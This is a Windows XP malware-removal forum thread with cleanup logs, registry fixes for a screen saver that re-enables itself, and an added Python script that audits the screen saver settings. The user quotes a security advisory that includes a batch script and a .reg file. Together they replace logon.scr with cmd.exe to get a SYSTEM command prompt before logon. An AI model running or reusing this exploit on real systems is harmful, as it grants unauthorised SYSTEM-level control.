Solved PC Performance Analysis and Stability Malware / registry repairs?

Status
Not open for further replies.
Here is the OTL log

All processes killed
========== OTL ==========
========== SERVICES/DRIVERS ==========
========== REGISTRY ==========
========== FILES ==========
C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\RegistryGenius_Setup.exe moved successfully.
C:\Program Files\Common Files\Wise Installation Wizard\WIS6A615007721D4063B226EA41EB6604B9_9_0_3_3.MSI moved successfully.
========== COMMANDS ==========

[EMPTYTEMP]

User: Administrator
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: All Users

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: fix
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: fix.ASUS-P1-W3V
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->FireFox cache emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: fix.ASUS-P1-W3V.000
->Temp folder emptied: 856938 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 63362207 bytes
->Flash cache emptied: 853 bytes

User: Guest
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: LocalService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33223 bytes

User: xxxxxxxxxxx

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\dllcache .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 483 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 61.00 mb


[EMPTYFLASH]

User: Administrator
->Flash cache emptied: 0 bytes

User: All Users

User: Default User
->Flash cache emptied: 0 bytes

User: fix
->Flash cache emptied: 0 bytes

User: fix.ASUS-P1-W3V
->Flash cache emptied: 0 bytes

User: fix.ASUS-P1-W3V.000
->Flash cache emptied: 0 bytes

User: Guest
->Flash cache emptied: 0 bytes

User: LocalService

User: NetworkService

User: xxxxxxxxxx

Total Flash Files Cleaned = 0.00 mb


OTL by OldTimer - Version 3.2.24.0 log created on 06182011_165037

Files\Folders moved on Reboot...

Registry entries deleted on Reboot...
 
One remaining problem?

Whatever program is making the "mystify" screensaver launch is still active, I think. Is there any specific way to check that or to know how dangerous it may be?

Should I run the OTL cleanup?
 
Hold on with the cleanup...

Please download SystemLook from one of the links below and save it to your Desktop.
Download Mirror #1
Download Mirror #2

64-bit users go HERE
  • Double-click SystemLook.exe to run it.
  • Vista\Win 7 users: Right click on SystemLook.exe, click Run As Administrator
  • Copy the content of the following box into the main textfield:
    Code:
    :filefind
    *.scr
    :reg
    HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel
    HKEY_USERS\.DEFAULT\Control Panel\Desktop
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
 
SystemLook 04.09.10 by jpshortstuff
Log created at 17:57 on 18/06/2011 by fix
Administrator - Elevation successful

========== filefind ==========

Searching for "*.scr"
C:\Documents and Settings\All Users\Documents\rkill.scr --a---- 1007108 bytes [05:18 03/06/2011] [05:28 03/06/2011] F206C61003B5F9E32A870CA9C6505963
C:\Documents and Settings\fix.ASUS-P1-W3V\My Documents\Downloads\dds.scr -r----- 607222 bytes [05:48 10/06/2011] [05:48 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\dds.scr -r----- 607222 bytes [17:40 10/06/2011] [17:40 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\rkill.scr --a---- 1007120 bytes [06:32 12/06/2011] [06:32 12/06/2011] 62B8E10334799A27218FBE57708A9FC1
C:\Documents and Settings\fix.ASUS-P1-W3V.000\My Documents\Downloads\dds.scr --a---- 607222 bytes [17:33 10/06/2011] [17:33 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
C:\Program Files\SDHelper (Spybot - Search & Destroy)\STQSEYVRYIKRNYNY.scr -rahs-- 1562960 bytes [08:31 16/06/2011] [21:25 15/09/2008] 35F73F1936BDE91F1B6995510A61E7A8
C:\Program Files\Spybot - Search & Destroy\GTLCSEUDCSDJNF.scr -rahs-- 1740632 bytes [08:49 16/06/2011] [22:31 26/01/2009] 7C616AD7AE8F75278A069641ECFCDC06
C:\Program Files\Spybot - Search & Destroy\KFRRJMFAONNJVHGPGV.scr --a---- 4393096 bytes [08:49 16/06/2011] [06:04 31/05/2005] 09CA174A605B480318731E691DC98539
C:\Program Files\Spybot - Search & Destroy\YVGXLHHZOXWJ.scr -rahs-- 2144088 bytes [08:49 16/06/2011] [22:31 26/01/2009] 896A1DB9A972AD2339C2E8569EC926D1
C:\Program Files\TeaTimer (Spybot - Search & Destroy)\XXIXEEZJBUKYWHXIH.scr -rahs-- 2260480 bytes [08:31 16/06/2011] [23:07 05/03/2009] 390679F7A217A5E73D756276C40AE887
C:\WINDOWS\$NtServicePackUninstall$\logon.scr -----c- 220672 bytes [21:24 09/11/2008] [12:00 04/08/2004] 43FCEEF75FD6208925DDD4FFF8C36723
C:\WINDOWS\$NtServicePackUninstall$\scrnsave.scr -----c- 9216 bytes [21:24 09/11/2008] [12:00 04/08/2004] BDFA8CF643506ECFAA89AA60250C4C08
C:\WINDOWS\$NtServicePackUninstall$\ss3dfo.scr -----c- 704512 bytes [21:24 09/11/2008] [12:00 04/08/2004] F7A268DC8F94B4404ADF6C648BF54289
C:\WINDOWS\$NtServicePackUninstall$\ssbezier.scr -----c- 19968 bytes [21:24 09/11/2008] [12:00 04/08/2004] 7309359BBE66C6CE4CD733B8F8F02953
C:\WINDOWS\$NtServicePackUninstall$\ssflwbox.scr -----c- 393216 bytes [21:24 09/11/2008] [12:00 04/08/2004] 72A5555729E786566823E6BB4ACD6FBD
C:\WINDOWS\$NtServicePackUninstall$\ssmarque.scr -----c- 20992 bytes [21:24 09/11/2008] [12:00 04/08/2004] 16869817BEE71AED4003B2C380B1FD44
C:\WINDOWS\$NtServicePackUninstall$\ssmypics.scr -----c- 47104 bytes [21:24 09/11/2008] [12:00 04/08/2004] 931B08F87AC66DA54FD5A0D8F73F5F34
C:\WINDOWS\$NtServicePackUninstall$\ssmyst.scr -----c- 18944 bytes [21:24 09/11/2008] [12:00 04/08/2004] 815A6CE9069C7D42E169657923C50756
C:\WINDOWS\$NtServicePackUninstall$\sspipes.scr -----c- 610304 bytes [21:24 09/11/2008] [12:00 04/08/2004] F6D28802AA6423D84F918AB202FA0584
C:\WINDOWS\$NtServicePackUninstall$\ssstars.scr -----c- 14336 bytes [21:24 09/11/2008] [12:00 04/08/2004] B7D61243AB22F27D059030499EC791F5
C:\WINDOWS\$NtServicePackUninstall$\sstext3d.scr -----c- 679936 bytes [21:24 09/11/2008] [12:00 04/08/2004] 5AB7A4EBBEA9B44C112FE99BC099837D
C:\WINDOWS\ServicePackFiles\i386\logon.scr ------- 220672 bytes [00:12 14/04/2008] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
C:\WINDOWS\ServicePackFiles\i386\scrnsave.scr ------- 9216 bytes [00:12 14/04/2008] [00:12 14/04/2008] 7BA27A296EE84861BFE97B96874CCAA6
C:\WINDOWS\ServicePackFiles\i386\ss3dfo.scr ------- 704512 bytes [00:12 14/04/2008] [00:12 14/04/2008] 2C0033EA0853E27C8E30603642D9FA84
C:\WINDOWS\ServicePackFiles\i386\ssbezier.scr ------- 19968 bytes [00:12 14/04/2008] [00:12 14/04/2008] 07EBBE91C46376AB0D38D61A629185B0
C:\WINDOWS\ServicePackFiles\i386\ssflwbox.scr ------- 393216 bytes [00:12 14/04/2008] [00:12 14/04/2008] E27992B5BE536EDE2D50A253A880C852
C:\WINDOWS\ServicePackFiles\i386\ssmarque.scr ------- 20992 bytes [00:12 14/04/2008] [00:12 14/04/2008] 6700DBF0268936EDF0922FE469DD3138
C:\WINDOWS\ServicePackFiles\i386\ssmypics.scr ------- 47104 bytes [00:12 14/04/2008] [00:12 14/04/2008] 5E453CB99DF0838226DEFC05F3484CDF
C:\WINDOWS\ServicePackFiles\i386\ssmyst.scr ------- 18944 bytes [00:12 14/04/2008] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA
C:\WINDOWS\ServicePackFiles\i386\sspipes.scr ------- 610304 bytes [00:12 14/04/2008] [00:12 14/04/2008] D5B0ED8ECA34F8480E555F47269AB0BA
C:\WINDOWS\ServicePackFiles\i386\ssstars.scr ------- 14336 bytes [00:12 14/04/2008] [00:12 14/04/2008] 86984E591641191236033D2A4D80ED56
C:\WINDOWS\ServicePackFiles\i386\sstext3d.scr ------- 679936 bytes [00:12 14/04/2008] [00:12 14/04/2008] D66709F79D595DD378C995C3347349C1
C:\WINDOWS\system32\7E7 Screensaver.scr --a---- 7732880 bytes [07:13 11/09/2006] [07:13 11/09/2006] C9B1EF9ED9E404EBAD2E539A2F7E979E
C:\WINDOWS\system32\Boeing 747-8.scr --a---- 2947372 bytes [19:26 16/02/2006] [19:26 16/02/2006] 2AF2CC23586C2DA2B4D6181A969064F0
C:\WINDOWS\system32\logon.scr --a---- 220672 bytes [12:00 04/08/2004] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
C:\WINDOWS\system32\scrnsave.scr --a---- 9216 bytes [12:00 04/08/2004] [00:12 14/04/2008] 7BA27A296EE84861BFE97B96874CCAA6
C:\WINDOWS\system32\ss3dfo.scr --a---- 704512 bytes [12:00 04/08/2004] [00:12 14/04/2008] 2C0033EA0853E27C8E30603642D9FA84
C:\WINDOWS\system32\ssbezier.scr --a---- 19968 bytes [12:00 04/08/2004] [00:12 14/04/2008] 07EBBE91C46376AB0D38D61A629185B0
C:\WINDOWS\system32\ssflwbox.scr --a---- 393216 bytes [12:00 04/08/2004] [00:12 14/04/2008] E27992B5BE536EDE2D50A253A880C852
C:\WINDOWS\system32\ssmarque.scr --a---- 20992 bytes [12:00 04/08/2004] [00:12 14/04/2008] 6700DBF0268936EDF0922FE469DD3138
C:\WINDOWS\system32\ssmypics.scr --a---- 47104 bytes [12:00 04/08/2004] [00:12 14/04/2008] 5E453CB99DF0838226DEFC05F3484CDF
C:\WINDOWS\system32\ssmyst.scr --a---- 18944 bytes [12:00 04/08/2004] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA
C:\WINDOWS\system32\sspipes.scr --a---- 610304 bytes [12:00 04/08/2004] [00:12 14/04/2008] D5B0ED8ECA34F8480E555F47269AB0BA
C:\WINDOWS\system32\ssstars.scr --a---- 14336 bytes [12:00 04/08/2004] [00:12 14/04/2008] 86984E591641191236033D2A4D80ED56
C:\WINDOWS\system32\sstext3d.scr --a---- 679936 bytes [12:00 04/08/2004] [00:12 14/04/2008] D66709F79D595DD378C995C3347349C1

========== reg ==========

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel]
(Unable to open key - key not found)

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
 
Give me some more details about that "mystify" screensaver.
When exactly can you see it, why do you call it "mystify" and whatever else you can give me...
 
I call it "mystify" because that's its name in the screensaver choices under display settings in control panel.

Well, I have a Spybot dialogue box popping up every once in a while telling me a warning that the system is trying to change a registry value with file names that look like they belong to the "mystify" screensaver (it is the one that is a bunch of triangles that bounce around on a black background). I have NEVER chosen to run that screensaver on my computer. If I fail to stop it, it sets itself to activate at 1 minute of inactivity. Sometimes it doesn't show up, sometimes it does.

Anyway, in the Spybot dialogue box I can choose to allow or deny the registry change, so every time it's popped up I have denied it. But I think once it ran even though I denied it in the spybot box.

Are any of these relevant files?

C:\WINDOWS\system32\ssmyst.scr --a---- 18944 bytes [12:00 04/08/2004] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA

C:\WINDOWS\ServicePackFiles\i386\ssmyst.scr ------- 18944 bytes [00:12 14/04/2008] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA

C:\WINDOWS\$NtServicePackUninstall$\ssmyst.scr -----c- 18944 bytes [21:24 09/11/2008] [12:00 04/08/2004] 815A6CE9069C7D42E169657923C50756
 
It looks like that's the "offending" file, but....it's a legit Microsoft screensaver, so I'm not sure why you're actually complaining about it.
 
It looks like that's the "offending" file, but....it's a legit Microsoft screensaver, so I'm not sure why you're actually complaining about it.

I just don't know why it has launched itself at a 1 minute start time when I have not selected any screensaver to run at all.

That is not normal, correct?
 
Double check screensaver settings. Something must be allowing it to run.

Then continue with OTL cleanup and other steps.
 
Upon computer start up/ loading windows my Spybot program caught it again.

Here is the text from the Spybot dialogue window:

Registry change alert
Category: Desktop Settings
Change: Value Added
Entry: scrnsave.exe
New Data: C:\WINDOWS\system32\ssmyst.scr

I then deny the change. I also looked for ssmyst.scr in the path shown above, but I don't see it in the tree.
 
I have "none" selected in control panel.

When this thing launches it runs the "mystify" screensaver at a 1 minute time selection. Without me asking for it.
 
Launch Notepad and paste the following four lines. (Note: The second line must be blank.)

Code:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Desktop]
"ScreenSaveActive"="0"

Save the file to your desktop with the name Disable ScreenSaver.reg.

Right click on the above file, click "Merge".

Restart computer.

Re-run SystemLook with the following code:

Code:
:reg
HKEY_USERS\.DEFAULT\Control Panel\Desktop

Post the log.
 
SystemLook 04.09.10 by jpshortstuff
Log created at 15:41 on 19/06/2011 by fix
Administrator - Elevation successful

========== reg ==========

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ActiveWndTrkTimeout"= 0x0000000000 (0)
"AutoEndTasks"="0"
"CaretWidth"= 0x0000000001 (1)
"CoolSwitch"="1"
"CoolSwitchColumns"="7"
"CoolSwitchRows"="3"
"CursorBlinkRate"="530"
"DragFullWindows"="2"
"DragHeight"="4"
"DragWidth"="4"
"FontSmoothing"="2"
"FontSmoothingOrientation"= 0x0000000001 (1)
"FontSmoothingType"= 0x0000000001 (1)
"ForegroundFlashCount"= 0x0000000003 (3)
"ForegroundLockTimeout"= 0x0000030d40 (200000)
"GridGranularity"="0"
"HungAppTimeout"="5000"
"LowPowerActive"="0"
"LowPowerTimeOut"="0"
"MenuShowDelay"="400"
"PaintDesktopVersion"= 0x0000000000 (0)
"Pattern"="(None)"
"PowerOffActive"="0"
"PowerOffTimeOut"="0"
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="logon.scr"
"TileWallpaper"="0"
"UserPreferencesMask"=9e 3e 03 80 (REG_BINARY)
"WaitToKillAppTimeout"="20000"
"Wallpaper"="(None)"
"WallpaperStyle"="2"
"OriginalWallpaper"=""
"WheelScrollLines"="3"

[HKEY_USERS\.DEFAULT\Control Panel\Desktop\WindowMetrics]


-= EOF =-




Have to go to work now. Thanks for all the assistance. Back about 9pm pacific time.
 
Found Screensaver Vulnerability Post on another site

Does this look like what may be going on with my system?


-- Advisory Name --

Default Screen Saver Vulnerability in Microsoft Windows

-- Author --

Susam Pal

-- Vulnerable Systems --

Windows XP, Windows 2003 Server

-- Vulnerability Description --

This vulnerability has been tested on Windows XP and Windows 2003 Server. The screen saver in these systems is allowed to run even when a user hasn't logged in. To verify this one has to start windows and wait for the default screen saver to appear without logging in. The screen saver should appear after 10 minutes because that is the default value of screen saver time-out.

Since no user logs in, this screen saver runs as a system process. The registry entries for this screen saver running as a system process can be found in the registry-key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop". The following are the default values.

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]

"ScreenSaverIsSecure"="0"

"ScreenSaveTimeOut"="600"

"ScreenSaveActive"="1"

"SCRNSAVE.EXE"="logon.scr"

It can be seen that the default time-out value is 600 seconds or 10 minutes.

An attacker can replace the default screen saver (logon.scr) with the command prompt (cmd.exe) and reduce the time-out period in a system by using a trojan or some other means. Later, the attacker can boot the system and wait for the screen saver to appear which is now the command prompt. Since the command prompt now runs as a system process, the attacker can perform critical operations including malicious ones. He may even execute "explorer.exe" to bring up the Windows GUI along with the desktop, start button, etc.

-- Exploit Reg File --

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]

"ScreenSaverIsSecure"="0"

"ScreenSaveTimeOut"="60"

"ScreenSaveActive"="1"

"SCRNSAVE.EXE"="logon.scr"

-- Exploit Script --

@echo off

rem ---------------------------------------------------------------------------

rem FileName: DSSExploit.bat

rem Description: This script replaces the default windows screensaver

rem with command prompt and configures the registry for

rem attack

rem Author: Susam Pal

rem Date: 19th May, 2006

rem ---------------------------------------------------------------------------

rem kill logon.scr if its running

tasklist | find /i "logon.scr"

if %errorlevel% == 1 goto replace

taskkill /f /im "logon.scr"

:replace

rem replace

rename %SystemRoot%\System32\logon.scr logon.scr.bak

copy %ComSpec% %SystemRoot%\System32\logon.scr

rem update the registry keys for default screen saver

set DSSKEY="HKEY_USERS\.DEFAULT\Control Panel\Desktop"

reg add %DSSKEY% /v ScreenSaveActive /t REG_SZ /f /d 1

reg add %DSSKEY% /v ScreenSaverIsSecure /t REG_SZ /f /d 0

reg add %DSSKEY% /v ScreenSaveTimeOut /t REG_SZ /f /d 60

reg add %DSSKEY% /v SCRNSAVE.EXE /t REG_SZ /f /d logon.scr

-- Prevention --

One of the following preventive measures should be taken.

1. The users of the system should not run any program, script or software obtained from unreliable source as an administrator or any user which has the permission to modify the Windows Registry.

2. Disable screen saver by executing the following command.

reg add "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /f /d 0

Deny everyone all permissions on the registry key, "My Computer\HKEY_USERS\.DEFAULT\Control Panel\Desktop". This will prevent any malicious program, script or software from modifying the default screen saver settings. This can be done by the following steps.

a. Run "regedit.exe".

b. Locate the key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop".

c. Right click on the key and select "Permissions".

d. Press "Add" button.

e. Press "Locations" button.

f. If a login window appears, click "Cancel" button.

g. Select the local computer and press "Ok" button.

h. Enter "Everyone" in the text-area for object names and press "Ok" button.

i. Deny "Full Control" permission for "Everyone" and press "Ok" button.

3. Microsoft should release a patch which prevents the screen saver from running before a user logs in with proper authentication.

-- Disclaimer --

The information, codes and exploits in this advisory should be used for research, experimentation, bug-fixes and patch-releases only. The author shall not be liable in any event of any damages, incidental or consequential, in connection with, or arising out of this advisory.

-- Contact Information --

For more information, please contact:-

Susam Pal

Infosys Technologies Ltd.

Survey No. 210, Manikonda Village

Lingampally, Rangareddy District

Hyderabad, PIN 500019

India

Phone No.: +91-9985259521

Email: susam.pal (at) gmail (dot) com [email concealed]

http://susampal.blogspot.com/

http://securecoding.blogspot.com/
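The advisory above and the SystemLook ":reg" dump posted earlier in this thread describe the same check in words: is the pre-logon screen saver under HKEY_USERS\.DEFAULT enabled, what does SCRNSAVE.EXE point at, and has the timeout been lowered. The following Python script is an added example, not part of this thread and not code from OTL, SystemLook or the advisory's author. It parses SystemLook's ":reg" and ":filefind" output formats, then reports those conditions and, because the advisory's scenario overwrites logon.scr in place (a name check cannot see that), compares the MD5 of the System32 copy with the ServicePackFiles\i386 copy, which SystemLook listed for both in the log above. It assumes %SystemRoot% is C:\WINDOWS, that the ServicePackFiles folder exists (as on this machine), and that the stock XP screen saver list is the set of names seen in the filefind output; the "tampered" sample line with an all-zero MD5 is constructed.

```python
"""Audit the pre-logon screen saver from SystemLook output (added example)."""
import ntpath
import re

# The default-desktop key the advisory and the thread's helper focus on.
DEFAULT_KEY = r"HKEY_USERS\.DEFAULT\Control Panel\Desktop"

# Screen savers Windows XP ships in %SystemRoot%\System32, taken from the names
# in the thread's ':filefind' output (assumption: this list is complete enough).
STOCK_XP_SAVERS = {
    "logon.scr", "scrnsave.scr", "ss3dfo.scr", "ssbezier.scr", "ssflwbox.scr",
    "ssmarque.scr", "ssmypics.scr", "ssmyst.scr", "sspipes.scr", "ssstars.scr",
    "sstext3d.scr",
}
SYSTEM32 = r"c:\windows\system32"               # assumption: %SystemRoot% is C:\WINDOWS
SP_FILES = r"c:\windows\servicepackfiles\i386"  # pristine copies laid down by the service pack

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=\s*(.*)$')
FILE_RE = re.compile(
    r"^(?P<path>.+?) (?P<attrs>[-a-z]{7}) (?P<size>\d+) bytes "
    r"\[[^\]]*\] \[[^\]]*\] (?P<md5>[0-9A-Fa-f]{32})$")

# Constructed samples. REG_DUMP_THREAD mirrors the ':reg' dump posted above
# (trimmed); FILEFIND_OK takes two lines from the thread's ':filefind' output;
# FILEFIND_TAMPERED is constructed, with a placeholder all-zero MD5 standing in
# for a logon.scr that was overwritten the way the advisory describes.
REG_DUMP_THREAD = r"""
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ForegroundLockTimeout"= 0x0000030d40 (200000)
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="logon.scr"
"UserPreferencesMask"=9e 3e 03 80 (REG_BINARY)
"""
REG_DUMP_FIXED = REG_DUMP_THREAD.replace('"ScreenSaveActive"="1"', '"ScreenSaveActive"="0"')
REG_DUMP_SHORT_TIMEOUT = REG_DUMP_THREAD.replace('"600"', '"60"')
FILEFIND_OK = r"""
C:\WINDOWS\ServicePackFiles\i386\logon.scr ------- 220672 bytes [00:12 14/04/2008] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
C:\WINDOWS\system32\logon.scr --a---- 220672 bytes [12:00 04/08/2004] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
"""
FILEFIND_TAMPERED = r"""
C:\WINDOWS\ServicePackFiles\i386\logon.scr ------- 220672 bytes [00:12 14/04/2008] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
C:\WINDOWS\system32\logon.scr --a---- 389120 bytes [12:00 04/08/2004] [00:12 14/04/2008] 00000000000000000000000000000000
"""


def parse_reg_section(text):
    """Map key path -> {value name: raw value text} from a SystemLook ':reg' dump."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(2)
    return keys


def reg_sz(raw, default=""):
    """Strip the quotes SystemLook prints around REG_SZ data; other types pass through."""
    if raw is None:
        return default
    return raw[1:-1] if len(raw) >= 2 and raw[0] == raw[-1] == '"' else raw


def parse_filefind(text):
    """Map lower-cased path -> upper-cased MD5 from a SystemLook ':filefind' dump."""
    files = {}
    for line in text.splitlines():
        m = FILE_RE.match(line.strip())
        if m:
            files[m.group("path").lower()] = m.group("md5").upper()
    return files


def audit_prelogon_screensaver(reg_text, filefind_text=""):
    """Return a list of findings; an empty list means no saver can start before logon."""
    values = parse_reg_section(reg_text).get(DEFAULT_KEY)
    if values is None:
        return ["%s is missing from the dump" % DEFAULT_KEY]
    if reg_sz(values.get("ScreenSaveActive"), "0") != "1":
        return []  # the state the helper's reg fix leaves behind
    findings = ["ScreenSaveActive=1: SCRNSAVE.EXE will run as SYSTEM before logon"]
    exe = ntpath.basename(reg_sz(values.get("SCRNSAVE.EXE"))).lower()
    if exe and exe not in STOCK_XP_SAVERS:
        findings.append("SCRNSAVE.EXE is not a stock XP saver: %s" % exe)
    try:
        timeout = int(reg_sz(values.get("ScreenSaveTimeOut"), "600"))
    except ValueError:
        timeout = None
        findings.append("ScreenSaveTimeOut is not numeric: %s" % values.get("ScreenSaveTimeOut"))
    if timeout is not None and timeout < 600:
        findings.append("ScreenSaveTimeOut lowered to %d s (Windows default is 600)" % timeout)
    # A name check cannot see a stock .scr overwritten in place, so compare the
    # System32 copy's MD5 with the ServicePackFiles copy when filefind data is given.
    files = parse_filefind(filefind_text)
    live, pristine = files.get(SYSTEM32 + "\\" + exe), files.get(SP_FILES + "\\" + exe)
    if exe and live and pristine and live != pristine:
        findings.append("%s in System32 differs from the ServicePackFiles copy (%s vs %s)"
                        % (exe, live, pristine))
    return findings


if __name__ == "__main__":
    for label, reg, ff in (("as posted", REG_DUMP_THREAD, FILEFIND_OK),
                           ("after fix", REG_DUMP_FIXED, FILEFIND_OK),
                           ("overwritten logon.scr", REG_DUMP_THREAD, FILEFIND_TAMPERED)):
        print(label, "->", audit_prelogon_screensaver(reg, ff) or ["clean"])
```

Run against the dump the thread's owner posted, the script reports exactly one thing: the pre-logon saver is enabled, which is the Windows default and is what the helper's final regedit step turns off. The hash comparison is only as good as the reference copy; on a machine without a ServicePackFiles folder, compare against a known-good MD5 from another installation of the same service pack instead.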
 
Go Start>Run, type in:
regedit
Click OK.

In Registry Editor, navigate to:
HKEY_USERS\.DEFAULT\Control Panel\Desktop
In right pane, right click on ScreenSaveActive, click Modify.
Change the value from 1 to 0 (zero).

Restart computer.
Will screensaver stay off?
 
Still with you.

Everything seems OK. Just odds and ends from fixing the registry like some programs that had desktop shortcuts (Excel, Word) were gone, calc.exe file disappeared from windows accessories. I guess those things are set up a certain way at windows installation and they reverted to a new install default.

Screen saver not launching any longer. All appears OK for now. Thanks for the help.
 
You're very welcome
 